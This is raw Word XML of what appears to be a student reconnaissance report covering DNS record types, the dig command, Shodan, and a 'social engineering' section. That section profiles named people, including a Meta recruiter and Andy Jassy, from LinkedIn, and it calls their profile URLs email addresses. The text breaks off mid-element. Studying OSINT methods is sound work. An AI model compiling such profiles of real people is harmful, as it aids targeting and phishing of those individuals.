    <w:p w14:paraId="48E49F57" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C1AA32" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s find which DNS and email servers are used by Fontys and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fhict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AAEE9E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459114EA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E2155" w14:paraId="2771C6FF" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="837"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40120017" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D9A3FC3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qyery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718CC14D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FE0A048" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="7F9ECFB0" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="694"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52EBDA22" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1C3EB7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPv4 Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="37EA4233" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="704"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9291A5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AAAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EA206A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPv6 Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="50383A93" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="703"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30FA6124" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106D67EA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Canonical Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="27B16709" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="557"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182BE695" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6739990D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mail Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="4B4F8237" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="730"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCA798B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A5A8F5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Start of Authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="35DD26CC" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="734"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44434F33" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654226F3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00615206" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615206">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TXT Records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="002636E1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55141640" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA67E26" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54426B6B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131FCC34" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E9A2AF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F12EB77" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E0108C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E775F1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA48966" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5237E8A4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E4CC92" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7588D394" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D29CD1A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dig: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dig is like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. It returns general information about the input domain. However, it returns more information such as the TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE2D7E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20142CD1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410812EF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCB3FD3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295C7C29" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C140A22" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5A102" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan is a search engine that provides information about all the reachable devices. You can get information about a network only by searching their domain name. Also, you can search for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it tries to connect you to that port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E775C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5985CFA6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7BFB3A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1861DDCE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Social Engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86D384" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering is tricking people to do things that they do not realize the consequences for it. This method helps us to gather information about the target. However, I am not intending to try this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>here. I will just do simple social engineering which is looking up information about people inside big companies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D6B2F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will use </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="001017FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.linkedin.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5CA35" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00347098" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cidnye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Work, M.Ed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B2ED1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cidney</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a university recruiter working for Meta. She went to Ohio University, and </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Institute for Veterans and Military Families</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Her email address is: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linkedin.com/in/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cidnyework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADFE06B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Andy Jassy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B13035" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">He is president and CEO at Amazon. He studied at Harvard university. His email address is: </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>linkedin.com/in/andy-jassy-8b1615</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D9311BC" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Serge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Leclercq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E1C20C7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="006B4B28" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
